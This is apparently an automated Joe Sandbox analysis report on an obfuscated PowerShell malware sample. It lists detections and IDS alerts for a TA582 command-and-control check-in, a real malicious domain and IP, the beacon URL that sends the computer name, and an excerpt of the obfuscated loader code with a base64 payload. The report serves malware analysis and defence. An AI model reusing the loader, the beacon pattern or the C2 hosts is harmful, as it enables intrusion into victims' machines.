Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ryOpDCeOHz.ps1

Overview

General Information

Sample name:ryOpDCeOHz.ps1
Analysis ID:1556310
MD5:b551ce903d61eebc28085b06a85c9af1
SHA1:d7a8cfb2bff805e931f737d5031117d001d109a8
SHA256:6074c8778c3efd5bf30622cce9dbd59a86a82047b131fa08d45b2ced417b3e4f
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 7652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", ProcessId: 7652, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5064, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1", ProcessId: 7652, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-15T09:34:06.667360+010028566541A Network Trojan was detected192.168.11.2049739206.188.196.3780TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-15T09:34:05.698762+010028590031Domain Observed Used for C2 Detected192.168.11.20608891.1.1.153UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://gidcldeaccadneh.topAvira URL Cloud: Label: malware
Source: Binary string: softy.pdbll source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb8 source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ows\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CFA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.6052454796.000001A557CB5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbO source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbP; source: powershell.exe, 00000000.00000002.6054362928.000001A557DFC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb8 source: powershell.exe, 00000000.00000002.6015657443.000001A53D813000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2859003 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.11.20:60889 -> 1.1.1.1:53
Source: Network trafficSuricata IDS: 2856654 - Severity 1 - ETPRO MALWARE TA582 CnC Checkin : 192.168.11.20:49739 -> 206.188.196.37:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 206.188.196.37 206.188.196.37
Source: Joe Sandbox ViewASN Name: DEFENSE-NETUS DEFENSE-NETUS
Source: global trafficHTTP traffic detected: GET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gidcldeaccadneh.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: gidcldeaccadneh.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: gidcldeaccadneh.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$fz6258ikejydvr9/$1pjduqg5e6wlfi4.php?id=$env:computername&key=$zqphcmeybxj&s=mints13
Source: powershell.exe, 00000000.00000002.6052454796.000001A557DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.X
Source: powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000000.00000002.6054715501.000001A5580F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crlft.com/prl/pMicT
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top
Source: powershell.exe, 00000000.00000002.6017075770.000001A540119000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gidcldeaccadneh.top/hqr7nx0sg1htr.php?id=computer&key=50024904669&s=mints13
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5410C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A541403000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5413EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A54109F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXz
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.6017075770.000001A53F901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.6017075770.000001A53FADB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000000.00000002.6017075770.000001A541BAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24h
Source: powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.6050369486.000001A557933000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000000.00000002.6017075770.000001A5412AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.png
Source: powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/celebrating-the-kayak-6753651837110586-2x.pngXz
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.6017075770.000001A540801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FBCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FC2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540769000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6017075770.000001A540783000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54F975000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.6044258706.000001A54FCD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.6017075770.000001A540BE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B0783D60_2_00007FFD3B0783D6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B0791820_2_00007FFD3B079182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B0623950_2_00007FFD3B062395
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B06C7630_2_00007FFD3B06C763
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B070C8A0_2_00007FFD3B070C8A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B06CCDB0_2_00007FFD3B06CCDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3B2D32230_2_00007FFD3B2D3223
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2164:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rvb4me13.rd2.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $4tsh3rv1n2lg0dz.(([char[]]@((-505+(6092-(12385-6865))),(880563/(71579459/(18051-(-275+(9777453/1051))))),(-188+(-1976+2276)),(213444/(8715-6951)),(684180/8145),(3483-3372)) -join ''))( $flse0ajpcbq8u7t ) $4tsh3rv1n2lg0dz.((-join (@((387059/5777),(-5017+(3110875/(-2880+3487))),(4229-(10634-6516)),(876875/7625),(330775/3275))| ForEach-Object { [char]$_ })))()$pznekuqyc34wrsl.(([char[]]@((7366-7299),(809892/(-2337+9836)),(-7825+(64694272/(2213+(-2811+8750)))),(-9868+(57691757/5779)),(5187-(6581-(7705-6210)))) -join ''))()[byte[]] $fqpxh9l42e61joz = $flse0ajpcbq8u7t.((-join (@((299-(584585/(5248-2529))),(448551/4041),(1246-(249191/211)),(-2212+(9192352/(8374288/2119))),(130074/1141),(5121-5024),(1860-1739))| ForEach-Object { [char]$_ })))() $b7cyefgw4m8lisr=$fqpxh9l42e61joz return $b7cyefgw4m8lisr}[System.Text.Encoding]::ascii.((-join (@((84987/(6283053/(582639/(176268/(255+(-7979+(21557280/(8870-6555)))))))),(946370/9370),(4606-4490),(176956/2132),(-3086+(-1742+(7409-2465))),(2259-2145),(9481-9376),(-2698+2808),(608-(3035-2530)))| ForEach-Object { [char]$_ })))((5uvim0x2sylp9367qrhofatne1b "buU7eWY4a3puY8zqKOEurhf/9FkqvIA0EYIIkFLDh/FuQWDqSSGC+J4ZZPh687UGVukR/oQagsGNlM6cuiOnMaCpBwlSEMaNhVdmhsOSsSUUksSLCovF+u0jvGUWHpict+Us5plInLOvluah3/KMQdnBh4iEpsLtZuEdtjlkFQmPpaS75tlspBtElZqT1oIJ7TGdhp/AJG1lfF7NTRHBzq3T/LX0/TxLD4ZpLunnVQeTl5OKkLuMJFiBkJKcFD4JjIbPgJdn5L0f1fXgEqKQ/njqHVbX961hSMlNDxDOpL17BTv5CKLtGw7jWv+2OM4FSuAlkhy03q57uPe9SVWApj5DxRdTtbe8Yyk/j9tpASAsDvjJ1Trx4wTuvMvuUYIALTXb+uO8/YHwAHoI2Dx1IN65VcCkUapEKsaJfw1gkgNlAIjfZhOpJvjkG+HG+t64J03YmuRdBlmTWQO74LX3uGzvP52OTEyfxweYQGpH7yYNbuDxXP9UmfzOAy3liNz9yuE9zxe7ZInRBpUsIrJRFjWHshFzAgo/egYKC4Es+cR1uTmtnT9s3nLvddnUTQ1lBrwsz9qgBhvH7kS5GfmvlSATMOXLi8MFPXCULl0jxUUfyKBZqez05cXQwKtZrKVhLV3FXNXzlRZbh6t3mGmSVaEGn173wIZHg/xZ4JCIVGWUH5CSrsHsxdXGnrzXkPrh9vE9priEGIejFDaIlp74oL9XLq6LOypp3AD0sJhLKUOP330lP12DsD0xzA/GWtLYEuSmPAHu+El7o7ajkgC1yHh/JwbMFVfC9QOX4Iq/wvWq1gqnELhrH0lJB/dtuELG/9DHZ9L7LyyMeaWflXSunqoVxRP+njPFxTuoS9S6TqzPrV2LQ90YTiT19hpPzwuhxle+2P0NUKzA1or+nTQ3WRHQIq2mMpYran+CZSG2GEe8ealpf0ulS1X/U4izuv9AyH4ZIFfvCJHZDmtvii+8D9CNGKZDRWr8o+TlYt1a9wKLffLyhRsYuPCsAMqJLcTaXTT0uQWOXW9/UrSmp/emQJj3/CVWHh+Bg4iumvPzTLWkrB+Mg+VMgY9Vr0PGhF5q/6kL/iQM7arTEKu8UZgOXMtJDd+zuriwlgxhAb/34pC2JXzqQCGPZUG/1TRkvQ/Kb1dZTwEdvHIKffPtAS/F8Bs31cA1bV4rCJvwml0PdOTV35CUrxy+3MJ2Y58rHbdzzcRUQyFFJj72/hwFyZ/XhZzFBHTVH5E/nUcMAbN0Ib9rxUX2GfIePvQM28R88EQKPTQY8NC0XReRdRxURiCy9PsdmT+yuwgtiqnlCI3C6N11PSnr2DrDSIOd6qm25QTHNluyd6F+b9Tf9pmIPJb87F0HVwWYi6ZxhjANBxfBh6C7q4PJbrDuKp/ICugS4A9/S06zwFXZgDti3YrXM18jW/lDsLK2hwk/WZrhoqxJXPkrowqbVff2FqiL2GXZSBFzegvfCWHtm15ZJRMPq+Nlj+hf5yluMqLgMQz4Q8g3JG6UNx0G8qBJ9wKng9N5SoW2R5x/XnyySnDXIFPWlEJS9vo1L/OnJ9mc/uERpL3DuQFEaQIu1Ygmscmmy79kX8cSsfvJQyAsKy14dwnbHfjW3AYFnkT26gd2b+rMMqnG+yMLPNZC9y6uJmWainyxENHfgiVyLV57jGSq8NfMcW+fsngqi2uwtVhwpccHlv/FikMNZiRBx1/ygcYF73aEtAwAcrJ8+JrvkAoKwtFztm+OCvxx8tYtCWSyumo5hrtq94QHDVUBdXo45b/+29Zw5Xc7ixg9ev7rCFwUt1iAJ2JsHvb+IypvOaFV9VMyY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ryOpDCeOHz.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
